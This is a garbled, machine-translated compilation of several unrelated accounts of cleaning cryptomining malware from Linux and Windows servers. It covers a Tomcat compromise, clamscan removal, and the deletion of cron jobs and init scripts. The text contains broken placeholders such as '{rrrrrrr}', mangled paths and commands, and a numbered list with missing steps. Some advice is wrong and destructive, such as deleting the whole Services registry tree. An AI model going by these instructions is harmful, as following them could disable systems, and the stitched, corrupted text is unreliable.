Linux cleaning mining virus
a new customer recently consulted with sine security company, saying that his server often fails to open the website of the card, and the remote connection to the server is extremely slow. Sometimes the Ping value reaches 300-500, and he often switches. After listening to the customer's words,
will generally judge that he has been attacked by CC + DDoS mixed traffic, It's strange to say that there is no traffic attack on the computer room. It's not a traffic attack, but it also causes the server card and website to fail to open. What kind of attack is this? In order to solve the problem of
client server card, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server
{rrrrrrr}
mining Trojan horse is also designed. If the mining process is forced to stop by customers, it will automatically start to continue mining to achieve uninterrupted mining.
careful inspection shows that it is through setting the hourly task plan, remotely downloading shell mining Trojan horse, and then executing, Check whether the current process exists or not. If not, start the Trojan horse to mine
a detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease through the security detection and analysis of our security engineers, we found that the server uses Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache, Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server,
virus. If the data was encrypted, the loss would be great. The client was a platform, and the client's data was very important. After finding out the mining Trojan horse,
do customers need to know how the server is attacked? Was the Trojan horse uploaded? It can prevent the attack
in the later stage
sine security engineer immediately repairs the Apache vulnerability and clears the Trojan horse. So far, the problem has been solved, the client server
runs stably, and the network station opens normally
Please do not visit strange websites. Browsing and downloading on strange websites may lead to poisoning
-
if there is a Trojan horse or virus program in the computer, install a security software (such as computer housekeeper, etc.). Use the security software to scan the whole disk to find the virus and delete it. If you can't handle it or there is an error, please try to back up important information and then re install the system
-
if there are trojans or virus programs in the mobile phone, install a security software (such as mobile phone housekeeper, etc.). Take the mobile phone housekeeper as an example, open the mobile phone housekeeper, click one key physical examination on the main interface to automatically detect the virus in the mobile phone, and click one key to remove it
you can download and install a Tencent Royal point
after opening it, you can directly check and kill this kind of computer virus by using the virus checking and killing function in it
the complete removal process of mining virus is as follows, please do it when the network is disconnected:
1. Stop and disable the hyper access protection agent service 2 3. Delete C: \% windows \% system32 \% vmichapagentsrv.dll. If the deletion fails, you can rename the file to another name 4. Restart the computer 5. Delete the directory C: (Windows) system32 (Sysprep themes) and C: (Windows) Sysprep themes 6. Delete C: / / Windows / system32 / secupdatehost.exe 7 https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010 8
this virus is a kind of stubborn virus. It needs to be killed in a safe mode.
the choice of antivirus software is also very important. You have to choose a special killing tool for this virus. You can use the computer housekeeper to kill the virus.
/Usr / SBIN / kworker suspected mining virus
use clamscn for virus scanning
{rrrrrrr}
all Trojans and Backdoors are recruited
and then use clamsan - R -- beli - I / usr / bin / kworker -- remove to clean up the virus, Learn Linux together
there is also a related netfs to clean up clamsan - R -- beli - I / usr / bin / netfs -- remove to clean up the virus
next step: modify the root password, restart and find that there is no worker
first of all, we need to determine which machine's network card is contracting out. Fortunately, we have ZABBIX monitoring. I checked one by one and found that the traffic of one machine is full. The problem should appear on this machine
I logged into the machine and checked the network card's traffic. My God, Actually ran this multi traffic
this machine mainly runs a Tomcat web service and Oracle database. The problem should not appear on the web service and database. I checked the web log and found no exception. Checking the database is normal and there is no error log. Checking the system log and there is no exception, I quickly checked the current running process to see if there are any abnormal processes. As soon as I checked, I found several abnormal processes. If I didn't look carefully, I really couldn't see that these processes were abnormal
what kind of process is this? Every time I use ps-ef, it's different. It's changing all the time. Process number one is changing. I want to see what files are opened by the process, but I can't start at the moment. Thinking of this, I suddenly realize that it should be some sub processes managed by a main process, so it's useless to look at these sub processes, Even if I kill them, there will be new generation. Catch the thief first. Let's go to the main process. I use top D1 to check the resource utilization of the process in real time to see if there are abnormal processes occupying CPU memory and other resources. I find a strange process that I haven't seen before. This should be the main process of the Trojan we are looking for
I tried to kill this process, kill - 9 ueksinzina, but after killing, PS - EF still checked the child processes, didn't it? Look at top D1 again and find that there is another main process. It seems that it can't be killed. If it's so easy to kill, it's not a Trojan horse
you can see that there is a timing task gcc4.sh in it, which is not set by us. It's even more strange to look at the content. This should be started after the listener died. Here, we delete all the relevant configurations, and delete / lib / libudev4.so
this file is also found in the / etc / init.d/directory
the contents are boot information, which we have also deleted.
so far, no new Trojan process has been generated. In principle, the Trojan program has been terminated. The following work is to clear the files generated by these directories. After I look for them, I first clear the Trojan startup script generated under the / etc / init. D directory, Then clear the connection file under the / etc / RC #. D / directory
later, I checked the modification time of the files in the / etc directory and found that there was a newly generated file in the SSH directory. I don't know if there was a problem. After cleaning up, we need to clean up several files generated just now, one by one directory clear, such as & quot; chattr -i /tmp", Then delete the Trojan file, and so on, delete the Trojan under / bin and / usr / bin directory, and the Trojan cleaning is completed.
Log in to the system to view the task manager, and view the processes that occupy large memory and cannot be closed. Right click on the process to open the file location (first select Show hidden files and operating system files in the folder option). At this time, you may see a systmss.exe process and a svchost.exe process imitating the operating system. Here you can also see a 2.bat file. Right click to edit and open this file to see which mining organization the malicious process communicates with
by viewing the system operation log, we can analyze the source of the virus, start time and other information. The general reason may be that the hacker did not close port 3389 and used a weak password to remotely log in to the last virus
virus eradication: rename the virus executable file systmss.exe to systmss.exe1, so that the virus cannot be executed. At this time, you can stop the process from the task manager. Open registry editor to delete HKEY_ LOCAL_ The entire directory of machine, system, controlset001, services and systems
for Linux system, please refer to: webpage link